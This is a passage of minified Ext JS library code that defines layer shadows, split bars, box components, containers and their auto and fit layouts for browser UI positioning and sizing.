this.shadowDisabled = true;
this.shadow.hide();
this.lastShadowOffset = this.shadowOffset;
this.shadowOffset = 0
}
}, enableShadow:function (c) {
if (this.shadow) {
this.shadowDisabled = false;
if (Ext.isDefined(this.lastShadowOffset)) {
this.shadowOffset = this.lastShadowOffset;
delete this.lastShadowOffset
}
if (c) {
this.sync(true)
}
}
}, sync:function (d) {
var n = this.shadow;
if (!this.updating && this.isVisible() && (n || this.useShim)) {
var i = this.getShim(), m = this.getWidth(), j = this.getHeight(), e = this.getLeft(true), o = this.getTop(true);
if (n && !this.shadowDisabled) {
if (d && !n.isVisible()) {
n.show(this)
} else {
n.realign(e, o, m, j)
}
if (i) {
if (d) {
i.show()
}
var k = n.el.getXY(), g = i.dom.style, c = n.el.getSize();
g.left = (k[0]) + "px";
g.top = (k[1]) + "px";
g.width = (c.width) + "px";
g.height = (c.height) + "px"
}
} else {
if (i) {
if (d) {
i.show()
}
i.setSize(m, j);
i.setLeftTop(e, o)
}
}
}
}, destroy:function () {
this.hideShim();
if (this.shadow) {
this.shadow.hide()
}
this.removeAllListeners();
Ext.removeNode(this.dom);
delete this.dom
}, remove:function () {
this.destroy()
}, beginUpdate:function () {
this.updating = true
}, endUpdate:function () {
this.updating = false;
this.sync(true)
}, hideUnders:function (c) {
if (this.shadow) {
this.shadow.hide()
}
this.hideShim()
}, constrainXY:function () {
if (this.constrain) {
var j = Ext.lib.Dom.getViewWidth(), d = Ext.lib.Dom.getViewHeight();
var o = Ext.getDoc().getScroll();
var n = this.getXY();
var k = n[0], i = n[1];
var c = this.shadowOffset;
var l = this.dom.offsetWidth + c, e = this.dom.offsetHeight + c;
var g = false;
if ((k + l) > j + o.left) {
k = j - l - c;
g = true
}
if ((i + e) > d + o.top) {
i = d - e - c;
g = true
}
if (k < o.left) {
k = o.left;
g = true
}
if (i < o.top) {
i = o.top;
g = true
}
if (g) {
if (this.avoidY) {
var m = this.avoidY;
if (i <= m && (i + e) >= m) {
i = m - e - 5
}
}
n = [k, i];
this.storeXY(n);
a.setXY.call(this, n);
this.sync()
}
}
return this
}, getConstrainOffset:function () {
return this.shadowOffset
}, isVisible:function () {
return this.visible
}, showAction:function () {
this.visible = true;
if (this.useDisplay === true) {
this.setDisplayed("")
} else {
if (this.lastXY) {
a.setXY.call(this, this.lastXY)
} else {
if (this.lastLT) {
a.setLeftTop.call(this, this.lastLT[0], this.lastLT[1])
}
}
}
}, hideAction:function () {
this.visible = false;
if (this.useDisplay === true) {
this.setDisplayed(false)
} else {
this.setLeftTop(-10000, -10000)
}
}, setVisible:function (i, h, k, l, j) {
if (i) {
this.showAction()
}
if (h && i) {
var g = function () {
this.sync(true);
if (l) {
l()
}
}.createDelegate(this);
a.setVisible.call(this, true, true, k, g, j)
} else {
if (!i) {
this.hideUnders(true)
}
var g = l;
if (h) {
g = function () {
this.hideAction();
if (l) {
l()
}
}.createDelegate(this)
}
a.setVisible.call(this, i, h, k, g, j);
if (i) {
this.sync(true)
} else {
if (!h) {
this.hideAction()
}
}
}
return this
}, storeXY:function (c) {
delete this.lastLT;
this.lastXY = c
}, storeLeftTop:function (d, c) {
delete this.lastXY;
this.lastLT = [d, c]
}, beforeFx:function () {
this.beforeAction();
return Ext.Layer.superclass.beforeFx.apply(this, arguments)
}, afterFx:function () {
Ext.Layer.superclass.afterFx.apply(this, arguments);
this.sync(this.isVisible())
}, beforeAction:function () {
if (!this.updating && this.shadow) {
this.shadow.hide()
}
}, setLeft:function (c) {
this.storeLeftTop(c, this.getTop(true));
a.setLeft.apply(this, arguments);
this.sync();
return this
}, setTop:function (c) {
this.storeLeftTop(this.getLeft(true), c);
a.setTop.apply(this, arguments);
this.sync();
return this
}, setLeftTop:function (d, c) {
this.storeLeftTop(d, c);
a.setLeftTop.apply(this, arguments);
this.sync();
return this
}, setXY:function (j, h, k, l, i) {
this.fixDisplay();
this.beforeAction();
this.storeXY(j);
var g = this.createCB(l);
a.setXY.call(this, j, h, k, g, i);
if (!h) {
g()
}
return this
}, createCB:function (e) {
var d = this;
return function () {
d.constrainXY();
d.sync(true);
if (e) {
e()
}
}
}, setX:function (g, h, j, k, i) {
this.setXY([g, this.getY()], h, j, k, i);
return this
}, setY:function (k, g, i, j, h) {
this.setXY([this.getX(), k], g, i, j, h);
return this
}, setSize:function (j, k, i, m, n, l) {
this.beforeAction();
var g = this.createCB(n);
a.setSize.call(this, j, k, i, m, g, l);
if (!i) {
g()
}
return this
}, setWidth:function (i, h, k, l, j) {
this.beforeAction();
var g = this.createCB(l);
a.setWidth.call(this, i, h, k, g, j);
if (!h) {
g()
}
return this
}, setHeight:function (j, i, l, m, k) {
this.beforeAction();
var g = this.createCB(m);
a.setHeight.call(this, j, i, l, g, k);
if (!i) {
g()
}
return this
}, setBounds:function (o, m, p, i, n, k, l, j) {
this.beforeAction();
var g = this.createCB(l);
if (!n) {
this.storeXY([o, m]);
a.setXY.call(this, [o, m]);
a.setSize.call(this, p, i, n, k, g, j);
g()
} else {
a.setBounds.call(this, o, m, p, i, n, k, g, j)
}
return this
}, setZIndex:function (c) {
this.zindex = c;
this.setStyle("z-index", c + 2);
if (this.shadow) {
this.shadow.setZIndex(c + 1)
}
if (this.shim) {
this.shim.setStyle("z-index", c)
}
return this
}})
})();
Ext.Shadow = function (d) {
Ext.apply(this, d);
if (typeof this.mode != "string") {
this.mode = this.defaultMode
}
var e = this.offset, c = {h:0}, b = Math.floor(this.offset / 2);
switch (this.mode.toLowerCase()) {
case"drop":
c.w = 0;
c.l = c.t = e;
c.t -= 1;
if (Ext.isIE) {
c.l -= this.offset + b;
c.t -= this.offset + b;
c.w -= b;
c.h -= b;
c.t += 1
}
break;
case"sides":
c.w = (e * 2);
c.l = -e;
c.t = e - 1;
if (Ext.isIE) {
c.l -= (this.offset - b);
c.t -= this.offset + b;
c.l += 1;
c.w -= (this.offset - b) * 2;
c.w -= b + 1;
c.h -= 1
}
break;
case"frame":
c.w = c.h = (e * 2);
c.l = c.t = -e;
c.t += 1;
c.h -= 2;
if (Ext.isIE) {
c.l -= (this.offset - b);
c.t -= (this.offset - b);
c.l += 1;
c.w -= (this.offset + b + 1);
c.h -= (this.offset + b);
c.h += 1
}
break
}
this.adjusts = c
};
Ext.Shadow.prototype = {offset:4, defaultMode:"drop", show:function (a) {
a = Ext.get(a);
if (!this.el) {
this.el = Ext.Shadow.Pool.pull();
if (this.el.dom.nextSibling != a.dom) {
this.el.insertBefore(a)
}
}
this.el.setStyle("z-index", this.zIndex || parseInt(a.getStyle("z-index"), 10) - 1);
if (Ext.isIE) {
this.el.dom.style.filter = "progid:DXImageTransform.Microsoft.alpha(opacity=50) progid:DXImageTransform.Microsoft.Blur(pixelradius=" + (this.offset) + ")"
}
this.realign(a.getLeft(true), a.getTop(true), a.getWidth(), a.getHeight());
this.el.dom.style.display = "block"
}, isVisible:function () {
return this.el ? true : false
}, realign:function (b, r, q, g) {
if (!this.el) {
return
}
var n = this.adjusts, k = this.el.dom, u = k.style, i = 0, p = (q + n.w), e = (g + n.h), j = p + "px", o = e + "px", m, c;
u.left = (b + n.l) + "px";
u.top = (r + n.t) + "px";
if (u.width != j || u.height != o) {
u.width = j;
u.height = o;
if (!Ext.isIE) {
m = k.childNodes;
c = Math.max(0, (p - 12)) + "px";
m[0].childNodes[1].style.width = c;
m[1].childNodes[1].style.width = c;
m[2].childNodes[1].style.width = c;
m[1].style.height = Math.max(0, (e - 12)) + "px"
}
}
}, hide:function () {
if (this.el) {
this.el.dom.style.display = "none";
Ext.Shadow.Pool.push(this.el);
delete this.el
}
}, setZIndex:function (a) {
this.zIndex = a;
if (this.el) {
this.el.setStyle("z-index", a)
}
}};
Ext.Shadow.Pool = function () {
var b = [], a = Ext.isIE ? '<div class="x-ie-shadow"></div>' : '<div class="x-shadow"><div class="xst"><div class="xstl"></div><div class="xstc"></div><div class="xstr"></div></div><div class="xsc"><div class="xsml"></div><div class="xsmc"></div><div class="xsmr"></div></div><div class="xsb"><div class="xsbl"></div><div class="xsbc"></div><div class="xsbr"></div></div></div>';
return{pull:function () {
var c = b.shift();
if (!c) {
c = Ext.get(Ext.DomHelper.insertHtml("beforeBegin", document.body.firstChild, a));
c.autoBoxAdjust = false
}
return c
}, push:function (c) {
b.push(c)
}}
}();
Ext.BoxComponent = Ext.extend(Ext.Component, {initComponent:function () {
Ext.BoxComponent.superclass.initComponent.call(this);
this.addEvents("resize", "move")
}, boxReady:false, deferHeight:false, setSize:function (b, d) {
if (typeof b == "object") {
d = b.height;
b = b.width
}
if (Ext.isDefined(b) && Ext.isDefined(this.boxMinWidth) && (b < this.boxMinWidth)) {
b = this.boxMinWidth
}
if (Ext.isDefined(d) && Ext.isDefined(this.boxMinHeight) && (d < this.boxMinHeight)) {
d = this.boxMinHeight
}
if (Ext.isDefined(b) && Ext.isDefined(this.boxMaxWidth) && (b > this.boxMaxWidth)) {
b = this.boxMaxWidth
}
if (Ext.isDefined(d) && Ext.isDefined(this.boxMaxHeight) && (d > this.boxMaxHeight)) {
d = this.boxMaxHeight
}
if (!this.boxReady) {
this.width = b;
this.height = d;
return this
}
if (this.cacheSizes !== false && this.lastSize && this.lastSize.width == b && this.lastSize.height == d) {
return this
}
this.lastSize = {width:b, height:d};
var c = this.adjustSize(b, d), g = c.width, a = c.height, e;
if (g !== undefined || a !== undefined) {
e = this.getResizeEl();
if (!this.deferHeight && g !== undefined && a !== undefined) {
e.setSize(g, a)
} else {
if (!this.deferHeight && a !== undefined) {
e.setHeight(a)
} else {
if (g !== undefined) {
e.setWidth(g)
}
}
}
this.onResize(g, a, b, d);
this.fireEvent("resize", this, g, a, b, d)
}
return this
}, setWidth:function (a) {
return this.setSize(a)
}, setHeight:function (a) {
return this.setSize(undefined, a)
}, getSize:function () {
return this.getResizeEl().getSize()
}, getWidth:function () {
return this.getResizeEl().getWidth()
}, getHeight:function () {
return this.getResizeEl().getHeight()
}, getOuterSize:function () {
var a = this.getResizeEl();
return{width:a.getWidth() + a.getMargins("lr"), height:a.getHeight() + a.getMargins("tb")}
}, getPosition:function (a) {
var b = this.getPositionEl();
if (a === true) {
return[b.getLeft(true), b.getTop(true)]
}
return this.xy || b.getXY()
}, getBox:function (a) {
var c = this.getPosition(a);
var b = this.getSize();
b.x = c[0];
b.y = c[1];
return b
}, updateBox:function (a) {
this.setSize(a.width, a.height);
this.setPagePosition(a.x, a.y);
return this
}, getResizeEl:function () {
return this.resizeEl || this.el
}, setAutoScroll:function (a) {
if (this.rendered) {
this.getContentTarget().setOverflow(a ? "auto" : "")
}
this.autoScroll = a;
return this
}, setPosition:function (a, g) {
if (a && typeof a[1] == "number") {
g = a[1];
a = a[0]
}
this.x = a;
this.y = g;
if (!this.boxReady) {
return this
}
var b = this.adjustPosition(a, g);
var e = b.x, d = b.y;
var c = this.getPositionEl();
if (e !== undefined || d !== undefined) {
if (e !== undefined && d !== undefined) {
c.setLeftTop(e, d)
} else {
if (e !== undefined) {
c.setLeft(e)
} else {
if (d !== undefined) {
c.setTop(d)
}
}
}
this.onPosition(e, d);
this.fireEvent("move", this, e, d)
}
return this
}, setPagePosition:function (a, c) {
if (a && typeof a[1] == "number") {
c = a[1];
a = a[0]
}
this.pageX = a;
this.pageY = c;
if (!this.boxReady) {
return
}
if (a === undefined || c === undefined) {
return
}
var b = this.getPositionEl().translatePoints(a, c);
this.setPosition(b.left, b.top);
return this
}, afterRender:function () {
Ext.BoxComponent.superclass.afterRender.call(this);
if (this.resizeEl) {
this.resizeEl = Ext.get(this.resizeEl)
}
if (this.positionEl) {
this.positionEl = Ext.get(this.positionEl)
}
this.boxReady = true;
Ext.isDefined(this.autoScroll) && this.setAutoScroll(this.autoScroll);
this.setSize(this.width, this.height);
if (this.x || this.y) {
this.setPosition(this.x, this.y)
} else {
if (this.pageX || this.pageY) {
this.setPagePosition(this.pageX, this.pageY)
}
}
}, syncSize:function () {
delete this.lastSize;
this.setSize(this.autoWidth ? undefined : this.getResizeEl().getWidth(), this.autoHeight ? undefined : this.getResizeEl().getHeight());
return this
}, onResize:function (d, b, a, c) {
}, onPosition:function (a, b) {
}, adjustSize:function (a, b) {
if (this.autoWidth) {
a = "auto"
}
if (this.autoHeight) {
b = "auto"
}
return{width:a, height:b}
}, adjustPosition:function (a, b) {
return{x:a, y:b}
}});
Ext.reg("box", Ext.BoxComponent);
Ext.Spacer = Ext.extend(Ext.BoxComponent, {autoEl:"div"});
Ext.reg("spacer", Ext.Spacer);
Ext.SplitBar = function (c, e, b, d, a) {
this.el = Ext.get(c, true);
this.el.dom.unselectable = "on";
this.resizingEl = Ext.get(e, true);
this.orientation = b || Ext.SplitBar.HORIZONTAL;
this.minSize = 0;
this.maxSize = 2000;
this.animate = false;
this.useShim = false;
this.shim = null;
if (!a) {
this.proxy = Ext.SplitBar.createProxy(this.orientation)
} else {
this.proxy = Ext.get(a).dom
}
this.dd = new Ext.dd.DDProxy(this.el.dom.id, "XSplitBars", {dragElId:this.proxy.id});
this.dd.b4StartDrag = this.onStartProxyDrag.createDelegate(this);
this.dd.endDrag = this.onEndProxyDrag.createDelegate(this);
this.dragSpecs = {};
this.adapter = new Ext.SplitBar.BasicLayoutAdapter();
this.adapter.init(this);
if (this.orientation == Ext.SplitBar.HORIZONTAL) {
this.placement = d || (this.el.getX() > this.resizingEl.getX() ? Ext.SplitBar.LEFT : Ext.SplitBar.RIGHT);
this.el.addClass("x-splitbar-h")
} else {
this.placement = d || (this.el.getY() > this.resizingEl.getY() ? Ext.SplitBar.TOP : Ext.SplitBar.BOTTOM);
this.el.addClass("x-splitbar-v")
}
this.addEvents("resize", "moved", "beforeresize", "beforeapply");
Ext.SplitBar.superclass.constructor.call(this)
};
Ext.extend(Ext.SplitBar, Ext.util.Observable, {onStartProxyDrag:function (a, e) {
this.fireEvent("beforeresize", this);
this.overlay = Ext.DomHelper.append(document.body, {cls:"x-drag-overlay", html:" "}, true);
this.overlay.unselectable();
this.overlay.setSize(Ext.lib.Dom.getViewWidth(true), Ext.lib.Dom.getViewHeight(true));
this.overlay.show();
Ext.get(this.proxy).setDisplayed("block");
var c = this.adapter.getElementSize(this);
this.activeMinSize = this.getMinimumSize();
this.activeMaxSize = this.getMaximumSize();
var d = c - this.activeMinSize;
var b = Math.max(this.activeMaxSize - c, 0);
if (this.orientation == Ext.SplitBar.HORIZONTAL) {
this.dd.resetConstraints();
this.dd.setXConstraint(this.placement == Ext.SplitBar.LEFT ? d : b, this.placement == Ext.SplitBar.LEFT ? b : d, this.tickSize);
this.dd.setYConstraint(0, 0)
} else {
this.dd.resetConstraints();
this.dd.setXConstraint(0, 0);
this.dd.setYConstraint(this.placement == Ext.SplitBar.TOP ? d : b, this.placement == Ext.SplitBar.TOP ? b : d, this.tickSize)
}
this.dragSpecs.startSize = c;
this.dragSpecs.startPoint = [a, e];
Ext.dd.DDProxy.prototype.b4StartDrag.call(this.dd, a, e)
}, onEndProxyDrag:function (c) {
Ext.get(this.proxy).setDisplayed(false);
var b = Ext.lib.Event.getXY(c);
if (this.overlay) {
Ext.destroy(this.overlay);
delete this.overlay
}
var a;
if (this.orientation == Ext.SplitBar.HORIZONTAL) {
a = this.dragSpecs.startSize + (this.placement == Ext.SplitBar.LEFT ? b[0] - this.dragSpecs.startPoint[0] : this.dragSpecs.startPoint[0] - b[0])
} else {
a = this.dragSpecs.startSize + (this.placement == Ext.SplitBar.TOP ? b[1] - this.dragSpecs.startPoint[1] : this.dragSpecs.startPoint[1] - b[1])
}
a = Math.min(Math.max(a, this.activeMinSize), this.activeMaxSize);
if (a != this.dragSpecs.startSize) {
if (this.fireEvent("beforeapply", this, a) !== false) {
this.adapter.setElementSize(this, a);
this.fireEvent("moved", this, a);
this.fireEvent("resize", this, a)
}
}
}, getAdapter:function () {
return this.adapter
}, setAdapter:function (a) {
this.adapter = a;
this.adapter.init(this)
}, getMinimumSize:function () {
return this.minSize
}, setMinimumSize:function (a) {
this.minSize = a
}, getMaximumSize:function () {
return this.maxSize
}, setMaximumSize:function (a) {
this.maxSize = a
}, setCurrentSize:function (b) {
var a = this.animate;
this.animate = false;
this.adapter.setElementSize(this, b);
this.animate = a
}, destroy:function (a) {
Ext.destroy(this.shim, Ext.get(this.proxy));
this.dd.unreg();
if (a) {
this.el.remove()
}
this.purgeListeners()
}});
Ext.SplitBar.createProxy = function (b) {
var c = new Ext.Element(document.createElement("div"));
document.body.appendChild(c.dom);
c.unselectable();
var a = "x-splitbar-proxy";
c.addClass(a + " " + (b == Ext.SplitBar.HORIZONTAL ? a + "-h" : a + "-v"));
return c.dom
};
Ext.SplitBar.BasicLayoutAdapter = function () {
};
Ext.SplitBar.BasicLayoutAdapter.prototype = {init:function (a) {
}, getElementSize:function (a) {
if (a.orientation == Ext.SplitBar.HORIZONTAL) {
return a.resizingEl.getWidth()
} else {
return a.resizingEl.getHeight()
}
}, setElementSize:function (b, a, c) {
if (b.orientation == Ext.SplitBar.HORIZONTAL) {
if (!b.animate) {
b.resizingEl.setWidth(a);
if (c) {
c(b, a)
}
} else {
b.resizingEl.setWidth(a, true, 0.1, c, "easeOut")
}
} else {
if (!b.animate) {
b.resizingEl.setHeight(a);
if (c) {
c(b, a)
}
} else {
b.resizingEl.setHeight(a, true, 0.1, c, "easeOut")
}
}
}};
Ext.SplitBar.AbsoluteLayoutAdapter = function (a) {
this.basic = new Ext.SplitBar.BasicLayoutAdapter();
this.container = Ext.get(a)
};
Ext.SplitBar.AbsoluteLayoutAdapter.prototype = {init:function (a) {
this.basic.init(a)
}, getElementSize:function (a) {
return this.basic.getElementSize(a)
}, setElementSize:function (b, a, c) {
this.basic.setElementSize(b, a, this.moveSplitter.createDelegate(this, [b]))
}, moveSplitter:function (a) {
var b = Ext.SplitBar;
switch (a.placement) {
case b.LEFT:
a.el.setX(a.resizingEl.getRight());
break;
case b.RIGHT:
a.el.setStyle("right", (this.container.getWidth() - a.resizingEl.getLeft()) + "px");
break;
case b.TOP:
a.el.setY(a.resizingEl.getBottom());
break;
case b.BOTTOM:
a.el.setY(a.resizingEl.getTop() - a.el.getHeight());
break
}
}};
Ext.SplitBar.VERTICAL = 1;
Ext.SplitBar.HORIZONTAL = 2;
Ext.SplitBar.LEFT = 1;
Ext.SplitBar.RIGHT = 2;
Ext.SplitBar.TOP = 3;
Ext.SplitBar.BOTTOM = 4;
Ext.Container = Ext.extend(Ext.BoxComponent, {bufferResize:50, autoDestroy:true, forceLayout:false, defaultType:"panel", resizeEvent:"resize", bubbleEvents:["add", "remove"], initComponent:function () {
Ext.Container.superclass.initComponent.call(this);
this.addEvents("afterlayout", "beforeadd", "beforeremove", "add", "remove");
var a = this.items;
if (a) {
delete this.items;
this.add(a)
}
}, initItems:function () {
if (!this.items) {
this.items = new Ext.util.MixedCollection(false, this.getComponentId);
this.getLayout()
}
}, setLayout:function (a) {
if (this.layout && this.layout != a) {
this.layout.setContainer(null)
}
this.layout = a;
this.initItems();
a.setContainer(this)
}, afterRender:function () {
Ext.Container.superclass.afterRender.call(this);
if (!this.layout) {
this.layout = "auto"
}
if (Ext.isObject(this.layout) && !this.layout.layout) {
this.layoutConfig = this.layout;
this.layout = this.layoutConfig.type
}
if (Ext.isString(this.layout)) {
this.layout = new Ext.Container.LAYOUTS[this.layout.toLowerCase()](this.layoutConfig)
}
this.setLayout(this.layout);
if (this.activeItem !== undefined && this.layout.setActiveItem) {
var a = this.activeItem;
delete this.activeItem;
this.layout.setActiveItem(a)
}
if (!this.ownerCt) {
this.doLayout(false, true)
}
if (this.monitorResize === true) {
Ext.EventManager.onWindowResize(this.doLayout, this, [false])
}
}, getLayoutTarget:function () {
return this.el
}, getComponentId:function (a) {
return a.getItemId()
}, add:function (b) {
this.initItems();
var e = arguments.length > 1;
if (e || Ext.isArray(b)) {
var a = [];
Ext.each(e ? arguments : b, function (h) {
a.push(this.add(h))
}, this);
return a
}
var g = this.lookupComponent(this.applyDefaults(b));
var d = this.items.length;
if (this.fireEvent("beforeadd", this, g, d) !== false && this.onBeforeAdd(g) !== false) {
this.items.add(g);
g.onAdded(this, d);
this.onAdd(g);
this.fireEvent("add", this, g, d)
}
return g
}, onAdd:function (a) {
}, onAdded:function (a, b) {
this.ownerCt = a;
this.initRef();
this.cascade(function (d) {
d.initRef()
});
this.fireEvent("added", this, a, b)
}, insert:function (e, b) {
var d = arguments, h = d.length, a = [], g, j;
this.initItems();
if (h > 2) {
for (g = h - 1; g >= 1; --g) {
a.push(this.insert(e, d[g]))
}
return a
}
j = this.lookupComponent(this.applyDefaults(b));
e = Math.min(e, this.items.length);
if (this.fireEvent("beforeadd", this, j, e) !== false && this.onBeforeAdd(j) !== false) {
if (j.ownerCt == this) {
this.items.remove(j)
}
this.items.insert(e, j);
j.onAdded(this, e);
this.onAdd(j);
this.fireEvent("add", this, j, e)
}
return j
}, applyDefaults:function (b) {
var a = this.defaults;
if (a) {
if (Ext.isFunction(a)) {
a = a.call(this, b)
}
if (Ext.isString(b)) {
b = Ext.ComponentMgr.get(b);
Ext.apply(b, a)
} else {
if (!b.events) {
Ext.applyIf(b.isAction ? b.initialConfig : b, a)
} else {
Ext.apply(b, a)
}
}
}
return b
}, onBeforeAdd:function (a) {
if (a.ownerCt) {
a.ownerCt.remove(a, false)
}
if (this.hideBorders === true) {
a.border = (a.border === true)
}
}, remove:function (a, b) {
this.initItems();
var d = this.getComponent(a);
if (d && this.fireEvent("beforeremove", this, d) !== false) {
this.doRemove(d, b);
this.fireEvent("remove", this, d)
}
return d
}, onRemove:function (a) {
}, doRemove:function (e, d) {
var b = this.layout, a = b && this.rendered;
if (a) {
b.onRemove(e)
}
this.items.remove(e);
e.onRemoved();
this.onRemove(e);
if (d === true || (d !== false && this.autoDestroy)) {
e.destroy()
}
if (a) {
b.afterRemove(e)
}
}, removeAll:function (c) {
this.initItems();
var e, g = [], b = [];
this.items.each(function (h) {
g.push(h)
});
for (var d = 0, a = g.length; d < a; ++d) {
e = g[d];
this.remove(e, c);
if (e.ownerCt !== this) {
b.push(e)
}
}
return b
}, getComponent:function (a) {
if (Ext.isObject(a)) {
a = a.getItemId()
}
return this.items.get(a)
}, lookupComponent:function (a) {
if (Ext.isString(a)) {
return Ext.ComponentMgr.get(a)
} else {
if (!a.events) {
return this.createComponent(a)
}
}
return a
}, createComponent:function (a, d) {
if (a.render) {
return a
}
var b = Ext.create(Ext.apply({ownerCt:this}, a), d || this.defaultType);
delete b.initialConfig.ownerCt;
delete b.ownerCt;
return b
}, canLayout:function () {
var a = this.getVisibilityEl();
return a && a.dom && !a.isStyle("display", "none")
}, doLayout:function (g, e) {
var k = this.rendered, j = e || this.forceLayout;
if (this.collapsed || !this.canLayout()) {
this.deferLayout = this.deferLayout || !g;
if (!j) {
return
}
g = g && !this.deferLayout
} else {
delete this.deferLayout
}
if (k && this.layout) {
this.layout.layout()
}
if (g !== true && this.items) {
var d = this.items.items;
for (var b = 0, a = d.length; b < a; b++) {
var h = d[b];
if (h.doLayout) {
h.doLayout(false, j)
}
}
}
if (k) {
this.onLayout(g, j)
}
this.hasLayout = true;
delete this.forceLayout
}, onLayout:Ext.emptyFn, shouldBufferLayout:function () {
var a = this.hasLayout;
if (this.ownerCt) {
return a ? !this.hasLayoutPending() : false
}
return a
}, hasLayoutPending:function () {
var a = false;
this.ownerCt.bubble(function (b) {
if (b.layoutPending) {
a = true;
return false
}
});
return a
}, onShow:function () {
Ext.Container.superclass.onShow.call(this);
if (Ext.isDefined(this.deferLayout)) {
delete this.deferLayout;
this.doLayout(true)
}
}, getLayout:function () {
if (!this.layout) {
var a = new Ext.layout.AutoLayout(this.layoutConfig);
this.setLayout(a)
}
return this.layout
}, beforeDestroy:function () {
var a;
if (this.items) {
while (a = this.items.first()) {
this.doRemove(a, true)
}
}
if (this.monitorResize) {
Ext.EventManager.removeResizeListener(this.doLayout, this)
}
Ext.destroy(this.layout);
Ext.Container.superclass.beforeDestroy.call(this)
}, cascade:function (g, e, b) {
if (g.apply(e || this, b || [this]) !== false) {
if (this.items) {
var d = this.items.items;
for (var c = 0, a = d.length; c < a; c++) {
if (d[c].cascade) {
d[c].cascade(g, e, b)
} else {
g.apply(e || d[c], b || [d[c]])
}
}
}
}
return this
}, findById:function (c) {
var a = null, b = this;
this.cascade(function (d) {
if (b != d && d.id === c) {
a = d;
return false
}
});
return a
}, findByType:function (b, a) {
return this.findBy(function (d) {
return d.isXType(b, a)
})
}, find:function (b, a) {
return this.findBy(function (d) {
return d[b] === a
})
}, findBy:function (d, c) {
var a = [], b = this;
this.cascade(function (e) {
if (b != e && d.call(c || e, e, b) === true) {
a.push(e)
}
});
return a
}, get:function (a) {
return this.getComponent(a)
}});
Ext.Container.LAYOUTS = {};
Ext.reg("container", Ext.Container);
Ext.layout.ContainerLayout = Ext.extend(Object, {monitorResize:false, activeItem:null, constructor:function (a) {
this.id = Ext.id(null, "ext-layout-");
Ext.apply(this, a)
}, type:"container", IEMeasureHack:function (k, g) {
var a = k.dom.childNodes, b = a.length, n, m = [], l, h, j;
for (h = 0; h < b; h++) {
n = a[h];
l = Ext.get(n);
if (l) {
m[h] = l.getStyle("display");
l.setStyle({display:"none"})
}
}
j = k ? k.getViewSize(g) : {};
for (h = 0; h < b; h++) {
n = a[h];
l = Ext.get(n);
if (l) {
l.setStyle({display:m[h]})
}
}
return j
}, getLayoutTargetSize:Ext.EmptyFn, layout:function () {
var a = this.container, b = a.getLayoutTarget();
if (!(this.hasLayout || Ext.isEmpty(this.targetCls))) {
b.addClass(this.targetCls)
}
this.onLayout(a, b);
a.fireEvent("afterlayout", a, this)
}, onLayout:function (a, b) {
this.renderAll(a, b)
}, isValidParent:function (b, a) {
return a && b.getPositionEl().dom.parentNode == (a.dom || a)
}, renderAll:function (e, g) {
var b = e.items.items, d, h, a = b.length;
for (d = 0; d < a; d++) {
h = b[d];
if (h && (!h.rendered || !this.isValidParent(h, g))) {
this.renderItem(h, d, g)
}
}
}, renderItem:function (d, a, b) {
if (d) {
if (!d.rendered) {
d.render(b, a);
this.configureItem(d)
} else {
if (!this.isValidParent(d, b)) {
if (Ext.isNumber(a)) {
a = b.dom.childNodes[a]
}
b.dom.insertBefore(d.getPositionEl().dom, a || null);
d.container = b;
this.configureItem(d)
}
}
}
}, getRenderedItems:function (g) {
var e = g.getLayoutTarget(), h = g.items.items, a = h.length, d, j, b = [];
for (d = 0; d < a; d++) {
if ((j = h[d]).rendered && this.isValidParent(j, e) && j.shouldLayout !== false) {
b.push(j)
}
}
return b
}, configureItem:function (b) {
if (this.extraCls) {
var a = b.getPositionEl ? b.getPositionEl() : b;
a.addClass(this.extraCls)
}
if (b.doLayout && this.forceLayout) {
b.doLayout()
}
if (this.renderHidden && b != this.activeItem) {
b.hide()
}
}, onRemove:function (b) {
if (this.activeItem == b) {
delete this.activeItem
}
if (b.rendered && this.extraCls) {
var a = b.getPositionEl ? b.getPositionEl() : b;
a.removeClass(this.extraCls)
}
}, afterRemove:function (a) {
if (a.removeRestore) {
a.removeMode = "container";
delete a.removeRestore
}
}, onResize:function () {
var c = this.container, a;
if (c.collapsed) {
return
}
if (a = c.bufferResize && c.shouldBufferLayout()) {
if (!this.resizeTask) {
this.resizeTask = new Ext.util.DelayedTask(this.runLayout, this);
this.resizeBuffer = Ext.isNumber(a) ? a : 50
}
c.layoutPending = true;
this.resizeTask.delay(this.resizeBuffer)
} else {
this.runLayout()
}
}, runLayout:function () {
var a = this.container;
this.layout();
a.onLayout();
delete a.layoutPending
}, setContainer:function (b) {
if (this.monitorResize && b != this.container) {
var a = this.container;
if (a) {
a.un(a.resizeEvent, this.onResize, this)
}
if (b) {
b.on(b.resizeEvent, this.onResize, this)
}
}
this.container = b
}, parseMargins:function (b) {
if (Ext.isNumber(b)) {
b = b.toString()
}
var c = b.split(" "), a = c.length;
if (a == 1) {
c[1] = c[2] = c[3] = c[0]
} else {
if (a == 2) {
c[2] = c[0];
c[3] = c[1]
} else {
if (a == 3) {
c[3] = c[1]
}
}
}
return{top:parseInt(c[0], 10) || 0, right:parseInt(c[1], 10) || 0, bottom:parseInt(c[2], 10) || 0, left:parseInt(c[3], 10) || 0}
}, fieldTpl:(function () {
var a = new Ext.Template('<div class="x-form-item {itemCls}" tabIndex="-1">', '<label for="{id}" style="{labelStyle}" class="x-form-item-label">{label}{labelSeparator}</label>', '<div class="x-form-element" id="x-form-el-{id}" style="{elementStyle}">', '</div><div class="{clearCls}"></div>', "</div>");
a.disableFormats = true;
return a.compile()
})(), destroy:function () {
if (this.resizeTask && this.resizeTask.cancel) {
this.resizeTask.cancel()
}
if (this.container) {
this.container.un(this.container.resizeEvent, this.onResize, this)
}
if (!Ext.isEmpty(this.targetCls)) {
var a = this.container.getLayoutTarget();
if (a) {
a.removeClass(this.targetCls)
}
}
}});
Ext.layout.AutoLayout = Ext.extend(Ext.layout.ContainerLayout, {type:"auto", monitorResize:true, onLayout:function (d, g) {
Ext.layout.AutoLayout.superclass.onLayout.call(this, d, g);
var e = this.getRenderedItems(d), a = e.length, b, h;
for (b = 0; b < a; b++) {
h = e[b];
if (h.doLayout) {
h.doLayout(true)
}
}
}});
Ext.Container.LAYOUTS.auto = Ext.layout.AutoLayout;
Ext.layout.FitLayout = Ext.extend(Ext.layout.ContainerLayout, {monitorResize:true, type:"fit", getLayoutTargetSize:function () {
var a = this.container.getLayoutTarget();
if (!a) {
return{}
}
return a.getStyleSize()
}, onLayout:function (a, b) {
Ext.layout.FitLayout.superclass.onLayout.call(this, a, b);
if (!a.collapsed) {
this.setItemSize(this.activeItem || a.items.itemAt(0), this.getLayoutTargetSize())
}
}, setItemSize:function (b, a) {
if (b && a.height > 0) {
b.setSize(a)
}
}});
